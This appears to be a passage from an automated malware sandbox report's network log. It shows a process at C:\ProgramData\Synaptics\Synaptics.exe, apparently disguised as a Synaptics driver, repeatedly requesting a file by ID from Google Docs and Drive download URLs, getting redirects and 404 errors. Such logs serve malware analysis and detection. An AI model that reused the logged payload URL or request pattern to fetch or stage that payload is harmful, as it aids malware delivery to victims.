                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            130192.168.2.849907142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:47 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            131192.168.2.849908142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:47 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            132192.168.2.849910142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:48 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-9jbNG8X59LUwMmng5rGZHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            133192.168.2.849909142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:48 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:48 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-M7SNPriW8tyrpU_jROxjqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            134192.168.2.849912142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:49 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7w9XFUSll-1KK49D6GwgDSOVXpXvVVi9o_pBGcE-o8-P2843QqHOsigNzEZ0HZmLsjPx8So9Q
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-3hNQjLAx7BCRxjBHP9_RlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:49 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:49 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 5f 76 47 54 4f 61 50 63 55 38 39 32 35 42 49 62 64 65 4f 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="a_vGTOaPcU8925BIbdeObw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:49 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            135192.168.2.849911142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:49 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-THnjrc4tSf5M-ExuP9S6aQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            136192.168.2.849914142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:49 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:49 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Co5mX4UpZBmoNmOoe3hbZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            137192.168.2.849913142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:50 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4ig0Hg9Sua_lGMyjQp4zW3AzwzA1n2c-D4Q2s5Ddq9vJywH2D5pAgkMkkjpy4dwPyd
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:49 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XlCrI5HnQ6PqhQFlB54k6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:50 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:50 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 75 45 69 67 41 48 30 44 78 7a 56 4d 4b 52 50 4b 37 5f 68 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="SuEigAH0DxzVMKRPK7_hlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:50 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            138192.168.2.849918142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:57 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-YrN8zSizZcOZuUDpG5USbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            139192.168.2.849919142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:57 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
